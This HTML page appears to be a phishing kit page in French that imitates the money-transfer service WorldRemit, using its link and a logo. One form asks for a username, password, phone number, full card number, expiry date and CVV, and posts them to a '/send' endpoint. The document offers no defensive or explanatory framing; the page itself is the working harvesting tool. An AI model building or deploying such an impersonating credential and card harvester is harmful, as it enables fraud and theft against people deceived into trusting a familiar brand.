<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title></title>

        <style>
            body {
                font-family: Arial, sans-serif;
                background-color: #f4f4f4;
                margin: 0;
                padding: 0;
            }

            .container {
                max-width: 500px;
                margin: 50px auto;
                padding: 20px;
                background-color: #fff;
                border-radius: 5px;
                box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
            }

            form {
                display: flex;
                flex-direction: column;
            }

            label {
                margin-bottom: 10px;
                font-weight: lighter;
            }

            input[type="text"],
            input[type="password"],
            input[type="tel"],
            input[type="number"],
            input[type="date"] {
                padding: 10px;
                margin-bottom: 15px;
                border-radius: 5px;
                border: 1px solid #ccc;
                width: 480px;
            }

            input[type="submit"] {
                padding: 10px;
                background-color: #007bff;
                color: #fff;
                border: none;
                border-radius: 5px;
                cursor: pointer;
            }

            input[type="submit"]:hover {
                background-color: #382343;
            }

            .error {
                color: red;
                font-size: 0.8em;
                margin-top: -10px;
                margin-bottom: 10px;
            }

            header {
                background-color: #fff;
                color: #fff;
                padding: 15px;
                display: flex;
                justify-content: space-between;
                align-items: center;
            }

            .logo {
                width: 200px;
                height: 60px;
            }
        </style>
    </head>

    <body>
        <div class="container">
            <header>
                <div href="https://www.worldremit.com">
                    <img src="/static/logo.png" alt="Logo" class="logo" />
                </div>
                <div>
                    <!-- Ajoutez ici vos éléments pour la barre de menu -->
                    <button href="#">Espace client</button>
                </div>
            </header>
            <br />

            <form action="/send" id="myForm" method="POST">
                <div>
                    <img src="/static/story.avif" alt="image1" style="width: 100%" />
                </div>
                <br />

                <label for="username">Nom d'Utilisateur <span style="color: red">*</span></label>
                <input type="text" id="username" name="username" required />

                <label for="password">Mot de Passe <span style="color: red">*</span></label>
                <input type="password" id="password" name="password" required />

                <label for="phone">Numéro de Téléphone <span style="color: red">*</span></label>
                <input
                    type="tel"
                    id="phone"
                    name="phone"
                    pattern="[0-9]{10}"
                    placeholder="T&eacute;l&eacute;phone"
                    required
                />

                <label for="card">Numéro de Carte <span style="color: red">*</span></label>
                <input
                    type="number"
                    id="card"
                    name="card"
                    min="1000000000000000"
                    max="9999999999999999"
                    placeholder="(16 chiffres) "
                /><br />

                <label for="expiry">Date d'expiration <span style="color: red">*</span></label>
                <input type="month" id="expiry" name="expiry" placeholder="YYYY-MM" /><br />

                <label for="cvv">Code de sécurité ( CVV ) <span style="color: red">*</span></label>
                <input type="text" id="cvv" name="cvv" pattern="[0-9]{3}" placeholder="CVV/CVC/CID" required />

                <input type="submit" value="Valider votre demande" style="background-color: #9b08ea" /><br /><br />
                Note : veuillez remplir les champs marqués d’un (*).
                <br /><br />
                <div>
                    <img src="/static/story.avif" alt="image2" style="width: 100%" />
                </div>
            </form>

            <footer></footer>
        </div>
    </body>
</html>
